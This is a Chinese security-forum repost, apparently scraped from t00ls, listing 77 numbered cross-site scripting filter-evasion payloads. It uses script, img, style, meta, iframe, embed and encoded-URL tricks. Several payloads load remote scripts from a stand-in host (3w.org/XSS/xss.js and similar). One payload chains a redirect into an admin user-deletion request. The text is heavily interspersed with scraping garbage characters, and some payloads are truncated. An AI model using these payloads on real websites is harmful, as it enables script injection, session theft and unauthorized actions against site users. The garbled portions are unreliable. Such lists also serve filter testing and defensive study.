貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。6 [- Y1 y3 l! L. U1 A1 }
(1)普通的XSS JavaScript注入0 \# s0 Z" I1 q: W1 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ I0 ]4 a4 |7 m/ g; W
(2)IMG标签XSS使用JavaScript命令5 M; U- H! T& i2 O8 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* Y! E6 V% r4 l' T) j @$ \ x(3)IMG标签无分号无引号
' W3 S+ M* A+ ^4 Z h8 i6 c<IMG SRC=javascript:alert(‘XSS’)>. w5 b% g/ r9 q @! ^' `+ l* f$ K
(4)IMG标签大小写不敏感
% n! X8 _. K) \, i, G; O<IMG SRC=JaVaScRiPt:alert(‘XSS’)># N, h# ~# r, s, o# P- y
(5)HTML编码(必须有分号)3 g8 V% y1 V# d
<IMG SRC=javascript:alert(“XSS”)>; f* C8 A+ k! y
(6)修正缺陷IMG标签- x9 H! I$ W8 ^8 \
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ R# I4 t0 J2 J7 b# d! P* A) h6 [5 w0 o
( |: k: x4 w$ Z# E5 i( b# A(7)formCharCode标签(计算器)5 k+ F L5 ^8 w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& H5 ` d$ ]7 d. Q/ s(8)UTF-8的Unicode编码(计算器)
* k6 ^3 ]7 x, b4 E# k% n) E. y3 _<IMG SRC=jav..省略..S')>- H* s- d. z7 L: M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
H4 P* k3 h- _8 W1 e% M<IMG SRC=jav..省略..S')># r6 K0 f3 v4 q1 D& y
(10)十六进制编码也是没有分号(计算器)
) |$ e! L. h! I4 y2 x( \% V<IMG SRC=java..省略..XSS')>
" Y. w! D: `8 B; m2 ]/ I) T- U' X(11)嵌入式标签,将Javascript分开0 s* O/ r" R K- }) T5 w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! M% ~. {( A" _7 f2 X* j6 x D* r(12)嵌入式编码标签,将Javascript分开
" A' M# j0 G9 d* E- [2 f u<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 c4 l0 u# n! {6 x' z$ h: J" ~% q8 |(13)嵌入式换行符- t, F+ U# ^. O
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ Z' U# W5 }% x2 Z0 K: Z
(14)嵌入式回车
0 R- u- ~4 K! Y- A5 w<IMG SRC=”jav ascript:alert(‘XSS’);”>; ] \) k7 Z+ {: b4 Y9 {; m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子7 k1 H# `2 j$ E8 U& s8 d
<IMG SRC=”javascript:alert(‘XSS‘)”>- X; E1 v; [5 z3 J3 j
(16)解决限制字符(要求同页面)
; l" w: h+ F/ e+ ?) u4 k* I2 S<script>z=’document.’</script>
8 E% ?( u/ P) k! |' c<script>z=z+’write(“‘</script>
5 t& m2 @ v+ ?; u; \) `: F<script>z=z+’<script’</script>8 O! N6 j' n3 s: w
<script>z=z+’ src=ht’</script>& k* {6 N% P* _' f- f! z" z
<script>z=z+’tp://ww’</script>
6 x# ]' B) X6 D/ ^- V$ B( O<script>z=z+’w.shell’</script>
3 Y9 ?4 \( O; m; ?0 f<script>z=z+’.net/1.’</script>
5 ? Z \$ L) [( G<script>z=z+’js></sc’</script>7 o5 E4 F+ C' [% U0 e
<script>z=z+’ript>”)’</script>" ?; A2 @6 K8 J
<script>eval_r(z)</script>: |* r4 H; j9 ]# T L! w" j
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
) @& ?4 B# G3 L6 ~: j. S5 whttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
' k9 x& p r/ w& ^' L) p& ]perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ \5 L: K" Y& J9 Q. m- f(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用7 a! `7 ^. y5 x3 b4 S9 R$ v$ {2 {
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out% |3 X" }3 S1 N" n" @0 P, i
(19)Spaces和meta前的IMG标签
3 g8 v. y- W0 a; c<IMG SRC=” javascript:alert(‘XSS’);”>
6 _. o% }; u* M. M(20)Non-alpha-non-digit XSS$ s8 Y, s3 i5 A. v [4 Y
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>/ V2 u. W U; y5 E. z& I% `
(21)Non-alpha-non-digit XSS to 24 W& M7 F& h% P4 c4 R( h/ o
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* x! ~% p6 D1 C1 V(22)Non-alpha-non-digit XSS to 3) ~# O& s1 n ~. p& Z, K) T% U
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT># r, T0 S {/ A
(23)双开括号
! e% g" ]" N a- O$ K) l) m( n<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ X) J6 a9 h6 p- X3 R' b2 I( r! B, R(24)无结束脚本标记(仅火狐等浏览器)! H3 S3 Q# ?5 x$ y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) @* J& y, u$ Y3 v8 J4 T(25)无结束脚本标记2$ g. r% r7 A) O7 }8 |
<SCRIPT SRC=//3w.org/XSS/xss.js>! g" |, u2 g' [6 k! G
(26)半开的HTML/JavaScript XSS1 Y! Q: f7 j( g6 i5 z
<IMG SRC=”javascript:alert(‘XSS’)” q# X# e/ m5 m+ X- q
(27)双开角括号
5 |4 h! U- f7 G! g% \<iframe src=http://3w.org/XSS.html <
, Y0 I a; x; H8 q(28)无单引号 双引号 分号
, b0 g2 j" s4 l: f2 w5 O! v& J( Y8 H<SCRIPT>a=/XSS/ V1 @5 n2 K, C" Y7 \0 y6 D$ m$ I. i
alert(a.source)</SCRIPT>0 j4 f8 {! u$ v' o1 r* b
(29)换码过滤的JavaScript
6 j# X. Z: P- |- L& f1 q7 W\”;alert(‘XSS’);//
! z, t/ a( \3 z8 ~/ C, a1 q+ [(30)结束Title标签
% q- f8 u* g- R& z5 u. @5 M</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; k M" K+ c1 m/ i5 T" m
(31)Input Image
/ s* s7 ^4 a- D0 g' R$ F6 {<INPUT SRC=”javascript:alert(‘XSS’);”>: A0 K [- P$ c% d2 }, {
(32)BODY Image
( u9 a2 h- o! x4 z+ [<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 Z% {5 r3 ^) x/ @ r(33)BODY标签- p5 l' f: b- k( t+ y
<BODY(‘XSS’)>' ~* P0 [2 C0 D2 I2 U/ B
(34)IMG Dynsrc: q L& { P# M2 ]3 ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>& ^& H" o% ?# ]! i9 Q
(35)IMG Lowsrc
! R. P& [# @9 B<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ e4 Q1 o* {. h8 |: U
(36)BGSOUND
$ R4 m; |& c" C, W2 y<BGSOUND SRC=”javascript:alert(‘XSS’);”>
& I/ X0 |6 Z: t( K1 u! }(37)STYLE sheet& f/ f' q& Y9 y" ]5 |- s t
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>* y+ b, h- z: n2 _+ n$ }& {! L
(38)远程样式表& H3 i* t9 d: c+ I1 t) t9 G( K7 F! n
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 U$ _/ i& N* I& I; A(39)List-style-image(列表式)/ K& ~! m9 j( E/ Q9 L C
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( A+ z ]' _0 ]/ l9 z(40)IMG VBscript
1 W8 D) S, {- b+ `) {0 b( R<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS8 a9 u8 I4 ]/ E% l9 @9 v h
(41)META链接url5 x+ U+ Q; z ?+ J6 E
3 w8 l: X7 n* N& ?) Z: }
9 Y9 }. l! A- p; w2 W7 p3 B<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ z6 z& `7 O# X4 `; o2 F1 C2 CURL=http://;URL=javascript:alert(‘XSS’);”>/ H' ^8 I3 U# `/ {1 X' F+ R' F
(42)Iframe2 b0 v7 u6 o0 z" f4 O: A7 Z
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ Y' m9 f1 F, q% j; F) Y
(43)Frame
2 ~+ j8 S/ q& S4 X6 Q<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board& _9 b _5 K2 B
https://www.t00ls.net/viewthread ... table&tid=15267 3/66 e, b5 X& C4 n# H
(44)Table
% r' T$ C6 h/ q% D9 i+ a& p2 d<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* L$ w0 C/ G6 |6 h8 S
(45)TD) [" W/ f# B) g- P; u: O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># b0 v) ?/ d$ ^2 h& x
(46)DIV background-image, y3 I+ L( T. G0 e y; Z+ k/ s0 w, y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& R# y& T0 x8 T- A/ k! N- e3 u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-' S, p" \. u) H2 j6 ?
8&13&12288&65279)
4 ~6 N' o3 R) b8 y! G. k$ l<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! S4 }% l' F4 L& { v* |- U/ H(48)DIV expression
% w# J5 l. d: {: x6 _. b$ l, O<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
0 Q* W+ T& Q0 Y8 c(49)STYLE属性分拆表达 F& T, Q! L1 o$ P% o, L" Q j( U
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 [4 g4 U: ]& f' v i! q7 ?
(50)匿名STYLE(组成:开角号和一个字母开头)
; _# j% @8 B( \<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 ]: u) j+ A5 g$ r9 Y: D
(51)STYLE background-image. m0 J; R) }' Y5 h
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A4 p5 H: X" S8 v$ M/ R2 y, S8 q/ n) S0 x
CLASS=XSS></A>
7 I+ w0 T4 z& p! W: T(52)IMG STYLE方式
! Y- r* ~* v) @6 oexppression(alert(“XSS”))’>1 _( |9 X, p- b: Q% x
(53)STYLE background! r' E' C: Z# B# ?$ d5 c
<STYLE><STYLE4 {, L4 h4 i) r! I5 j
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. Z* H- c7 d0 L) F0 I(54)BASE4 g( w; }% D! \1 X9 s5 H+ G/ F
<BASE HREF=”javascript:alert(‘XSS’);//”> M- u1 P; {+ e' A' D; ^
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ O: t4 w# \, X1 L- C<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
' _4 e( i# i6 j+ s3 T6 j# D$ d/ H8 a(56)在flash中使用ActionScrpt可以混进你XSS的代码# G3 g, l2 i# F2 p# M; ]! r0 ]
a=”get”;! b1 f+ N- b. J' n8 ^
b=”URL(\”";
6 H" s. D- M# q+ o% M& ~( ~5 }# }c=”javascript:”;
% W) B1 C* t0 T& H' |+ vd=”alert(‘XSS’);\”)”;, Q2 J2 _$ ^! Y1 m1 A
eval_r(a+b+c+d); e: G) j0 E/ m# [& ?1 @. \
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上: h) T& Y5 |! e, x0 t# |
<HTML xmlns:xss>0 Y$ e3 ?( i5 R+ V/ n @5 d
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
- Y; K" s# H p+ H1 p; y }) X<xss:xss>XSS</xss:xss>/ M, E6 p! D5 P' e* ?" _
</HTML>
4 |, @; r9 t# L7 |# |3 E(58)如果过滤了你的JS你可以在图片里添加JS代码来利用0 Z u6 c# p/ E: }- L1 F$ `
<SCRIPT SRC=””></SCRIPT>
/ h# u5 H2 d Y4 I) X% |- s(59)IMG嵌入式命令,可执行任意命令
+ g3 A& w* \0 W: x! }! [7 Q2 T% f8 _* e<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" D: e1 m% P+ s6 A. d9 j(60)IMG嵌入式命令(a.jpg在同服务器)
1 @, B$ D* z3 z! U2 zRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 d& z- [- c9 J(61)绕符号过滤
L3 `8 `( S# q5 N<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 S" z& k r2 w7 T/ v
(62)
5 D% ?! _: T+ f* C% B<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* E Q' Q& e) P. |" P3 J
(63)( `1 l( ^5 X' i
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ F1 @6 m7 \) ?# g# e(64)( U x/ _9 x; \6 P6 F5 A
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> H* @3 A* T+ O4 `4 T3 I
(65)
4 V4 I( T$ x! L, a1 {<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( s! j9 R! \( b+ _% c(66)12-7-1 T00LS - Powered by Discuz! Board! v/ |5 I" U5 w( |3 j7 N
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
6 h- m. U* t- Y! n2 M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 f. L/ J& n' q( Z(67)
0 R4 Q6 O6 o% L, q5 E7 s% g5 ~<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
* f! B+ l/ _- y, ]" i</SCRIPT>8 b8 v# ?6 z1 o9 E' k
(68)URL绕行
4 W6 e# o. M. T6 X. G<A HREF=”http://127.0.0.1/”>XSS</A>
; X8 W" g: h: ^% f) |2 o(69)URL编码
: B8 E5 H, m1 o+ e<A HREF=”http://3w.org”>XSS</A>0 V4 O" m" m9 g+ @
(70)IP十进制- E0 s/ j6 j0 O4 e3 q
<A HREF=”http://3232235521″>XSS</A>
. B3 G( n8 b& h+ M& m/ l0 s(71)IP十六进制/ r! Q: g3 C: ^' c6 u5 i$ F
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
( B* D4 q) c& M4 a: h, ?(72)IP八进制
# I# n3 w3 |% K8 f. O<A HREF=”http://0300.0250.0000.0001″>XSS</A>4 p" N5 e0 w: `2 f6 E; e2 F( M
(73)混合编码7 R, K A+ Q6 S' p5 j& `
<A HREF=”h3 L' c9 w) ?" j1 K2 X+ }3 X
tt p://6 6.000146.0×7.147/”">XSS</A>1 X6 K: [; v7 S
(74)节省[http:]
$ U3 f. `: \7 e/ t& {<A HREF=”//www.google.com/”>XSS</A>
+ |- B: g/ B+ O; H(75)节省[www]) o) I& R$ I1 Q P0 p H
<A HREF=”http://google.com/”>XSS</A>
' l- k% V3 R9 v% @4 k5 e(76)绝对点绝对DNS; o# B% _) a; o
<A HREF=”http://www.google.com./”>XSS</A>
- Q! {4 Q' m: E(77)javascript链接$ \ C" o3 o# v* N& ~
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
* |; G/ a. O- T4 W( u$ }- M8 w
" m+ p' X, i, M/ E/ A原文地址:http://fuzzexp.org/u/0day/?p=14' u; g# \/ y1 H2 P& {# p! l1 f: Q8 m+ q
- B- T# X3 D# C7 x( o
|
发表于 2013-4-19 19:22:37
收藏
支持
反对